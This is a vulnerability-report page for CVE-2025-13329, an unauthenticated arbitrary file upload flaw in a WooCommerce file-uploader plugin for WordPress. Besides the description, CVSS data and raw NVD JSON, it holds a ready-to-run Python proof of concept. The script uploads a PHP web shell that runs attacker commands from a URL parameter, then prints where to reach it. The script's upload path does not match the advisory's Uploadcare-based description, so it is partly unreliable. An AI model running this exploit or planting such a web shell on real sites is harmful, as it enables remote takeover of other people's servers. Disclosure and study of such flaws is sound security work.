Security Vulnerability Report
中文
CVE-2025-13329 CVSS 9.8 CRITICAL

CVE-2025-13329

Published: 2025-12-20 04:16:07
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The File Uploader for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the callback function for the 'add-image-data' REST API endpoint in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to upload arbitrary files to the Uploadcare service and subsequently download them on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

File Uploader for WooCommerce <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13329 PoC - File Uploader for WooCommerce Arbitrary File Upload # Target: WordPress site with File Uploader for WooCommerce plugin <= 1.0.3 TARGET_URL = "https://vulnerable-site.com" WP_REST_API = f"{TARGET_URL}/wp-json/file-uploader/v1/add-image-data" # Malicious PHP file content for RCE php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Prepare the malicious file files = { 'file': ('shell.php', php_payload, 'application/x-php') } # Send the malicious file upload request response = requests.post(WP_REST_API, files=files, verify=False) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # If successful, the attacker can then download and execute the shell if response.status_code in [200, 201]: result = response.json() print(f"File uploaded successfully!") print(f"File URL: {result.get('file_url', 'Check response')}") print(f"Now access the shell at: {TARGET_URL}/wp-content/uploads/{result.get('filename', 'shell.php')}?cmd=whoami")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13329", "sourceIdentifier": "[email protected]", "published": "2025-12-20T04:16:07.207", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The File Uploader for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the callback function for the 'add-image-data' REST API endpoint in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to upload arbitrary files to the Uploadcare service and subsequently download them on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3423070/file-uploader-for-woocommerce/trunk/src/Helpers/class-uploaderhelper.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/file-uploader-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/da0f0e1a-bbf8-42a5-b330-b53134488ebd?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.